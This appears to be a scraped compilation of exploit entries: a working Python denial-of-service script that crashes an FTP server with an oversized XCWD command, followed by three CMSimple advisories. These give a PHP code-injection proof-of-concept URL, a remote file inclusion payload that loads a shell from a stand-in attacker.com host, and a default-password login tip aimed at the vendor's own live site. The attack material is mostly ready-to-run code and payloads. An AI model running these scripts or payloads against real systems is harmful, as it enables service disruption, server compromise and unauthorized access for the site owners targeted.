# Email			: im.aguilar@protonmail.ch
# Discovery Date    	: 18.01.2016
# Tested Version    	: 0.99g
# Vulnerability Type  : Denial of Service (DoS)
# Tested on OS      	: Windows XP Professional SP3 x86 es

import socket


buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)

s.send('USER ftp\r\n')
s.recv(1024)

s.send('PASS ftp\r\n')
s.recv(1024)

s.send( buffer  + '\r\n')
print '[+] Buffer sent'
s.close()
HireHackking 
source: https://www.securityfocus.com/bid/68961/info
  
CMSimple is prone to multiple security vulnerabilities including:
  
1. Multiple arbitrary PHP code-execution vulnerabilities
2. A weak authentication security-bypass vulnerability
3. Multiple security vulnerabilities
  
An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 

vulnerable file "http://www.example.com/CMSimple/2author/index.php" 

An attacker might execute arbitrary PHP code with this vulnerability. User tainted data is embedded into a function that compiles PHP code on the run and executes it thus allowing an attacker to inject own PHP code that will be executed. 
This vulnerability can lead to full server compromise.

Vulnerable Code:
-------------------------------------vulnerable code---------------------------------------
    1320: preg_replace $c[$s] = preg_replace($words, '<span style="background: ' . $cmsimple_highlight_bg . '; color: ' . $cmsimple_highlight_tx . ';">\\0</span>', $c[$s]);  // functions.php
        1316: $words = array_map(create_function('$w', 'return "&".$w."(?!([^<]+)?>)&isU";'), $words);  // functions.php
            1315: $words = explode(',', urldecode($_GET['search']));  // functions.php
        1308:  function content($cmsimple_highlight_bg = NULL, $cmsimple_highlight_tx = NULL)
        1308:  function content($cmsimple_highlight_bg = NULL, $cmsimple_highlight_tx = NULL)
--------------------------------------vulnerable Code---------------------------------------
    1324: preg_replace $c[$s] = preg_replace($words, '<span class="highlight_search">\\0</span>', $c[$s]);  // functions.php
        1316: $words = array_map(create_function('$w', 'return "&".$w."(?!([^<]+)?>)&isU";'), $words);  // functions.php
            1315: $words = explode(',', urldecode($_GET['search']));  // functions.php
    



-------------------------------PoC:------------------------------ 
http://www.example.com/CMSimple/2author/index.php?color=';phpinfo();//

also effect these files :
    CMSimple/2lang/index.php
    CMSimple/2site/index.php
    CMSimple/2site2lang/index.php
    CMSimple/cmsimple/cms.php
    CMSimple/cmsimple/functions.php
    CMSimple/index.php
HireHackking 
source: https://www.securityfocus.com/bid/68961/info
 
CMSimple is prone to multiple security vulnerabilities including:
 
1. Multiple arbitrary PHP code-execution vulnerabilities
2. A weak authentication security-bypass vulnerability
3. Multiple security vulnerabilities
 
An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 

vulnerable file "http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php"

Vulnerable Code :
-----------------------------------vulnerable Code----------------------------------------

        require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
        require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';

exploit Code :
-------------------------------------PoC----------------------------------------

http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?

also embedded These files :
    CMSimple/2lang/index.php
    CMSimple/2site/index.php
    CMSimple/cmsimple/cms.php
    CMSimple/index.php
    CMSimple/plugins/index.php
HireHackking 
source: https://www.securityfocus.com/bid/68961/info

CMSimple is prone to multiple security vulnerabilities including:

1. Multiple arbitrary PHP code-execution vulnerabilities
2. A weak authentication security-bypass vulnerability
3. Multiple security vulnerabilities

An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions and execute arbitrary script code in the context of the affected application. This may aid in further attacks. 

Any user can login just with simple password "test" which is the default cms password & there own vendor site is vulnerable with weak authentication 
just login without user name & also with default password "test" here "http://cmsimple.org/2author/?Welcome_to_CMSimple&login"